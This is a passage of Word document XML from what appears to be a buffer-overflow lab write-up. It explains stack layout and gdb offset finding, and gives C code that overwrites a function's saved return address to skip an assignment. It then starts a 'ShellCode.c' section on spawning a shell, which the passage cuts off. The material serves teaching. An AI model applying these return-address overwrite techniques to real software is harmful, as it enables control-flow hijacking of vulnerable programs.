        <w:t>Immediately preceding the buffer1[] array on the stack, there is the Saved Frame Pointer (SFP), and before that, the return address. The return address is located 4 bytes beyond the end of buffer1[]. However, it is essential to note that buffer1[] is actually 2 words in length, equivalent to 8 bytes. As a result, the address calculated is 12 bytes from the start of buffer1[]. Consequently, in the given statement, the value of buffer1 is incremented by 12.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F26B057" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A47DE03" w14:textId="33D80C51" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ret = buffer1 + 12;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721CDBD9" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="582B0DF7" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C39992" w14:textId="1870FBB4" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">To determine the specific value of 8 bytes that needed to be added in this scenario, we utilized a debugger tool such as "gdb". </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>By employing gdb, we examined the program's execution and stack layout to identify the correct number of bytes required for our intended manipulation. Through this process of debugging and analysis, we verified and established the value of 8 bytes as the necessary adjustment in this particular case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E72B8A" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777E1B21" w14:textId="6718CE2B" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(*ret) += 8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE3C490" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF8A0A8" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C38066C" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>void main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5B62AF" w14:textId="77777777" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E59A62" w14:textId="70081804" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int x;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B606E08" w14:textId="63AF9459" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D69E6E0" w14:textId="6C977787" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>function(1,2,3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CADB2B" w14:textId="105E0B04" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x = 1;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>//Bypass the assignment statement 'x = 1' by lauching the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B46D883" w14:textId="22D9AEEF" w:rsidR="00C8702C" w:rsidRPr="00C8702C" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>printf("%d\n",x);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266004DD" w14:textId="7F5473A5" w:rsidR="000C73DF" w:rsidRDefault="00C8702C" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8702C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E574C7" w14:textId="15D2D9B3" w:rsidR="00CA2921" w:rsidRDefault="00CA2921" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F676DA" w14:textId="694FD78C" w:rsidR="00CA2921" w:rsidRDefault="002162D2" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ShellCode.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370D1816" w14:textId="0C61D1FF" w:rsidR="002162D2" w:rsidRDefault="002162D2" w:rsidP="00CA2921">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1CF7D9" w14:textId="77777777" w:rsidR="00687BBC" w:rsidRPr="00687BBC" w:rsidRDefault="00687BBC" w:rsidP="00C172E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D1F10" w14:textId="77777777" w:rsidR="00687BBC" w:rsidRPr="00687BBC" w:rsidRDefault="00687BBC" w:rsidP="00C172E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A shellcode is basically a piece of code that launches a shell. If we use the C code to implement it, it will look like the following code. This is the code to spawn a shell in C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DA3D8" w14:textId="77777777" w:rsidR="00687BBC" w:rsidRPr="00687BBC" w:rsidRDefault="00687BBC" w:rsidP="00C172E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B03790D" w14:textId="77777777" w:rsidR="00687BBC" w:rsidRPr="00687BBC" w:rsidRDefault="00687BBC" w:rsidP="00C172E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F47AA90" w14:textId="77777777" w:rsidR="00687BBC" w:rsidRPr="00687BBC" w:rsidRDefault="00687BBC" w:rsidP="00C172E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B670AB1" w14:textId="77777777" w:rsidR="00687BBC" w:rsidRPr="00687BBC" w:rsidRDefault="00687BBC" w:rsidP="00C172E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>void main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B11DA80" w14:textId="77777777" w:rsidR="00687BBC" w:rsidRPr="00687BBC" w:rsidRDefault="00687BBC" w:rsidP="00C172E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687BBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F8552A" w14:textId="4E4A45B8" w:rsidR="00687BBC" w:rsidRPr="00687BBC" w:rsidRDefault="00687BBC" w:rsidP="00C172E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
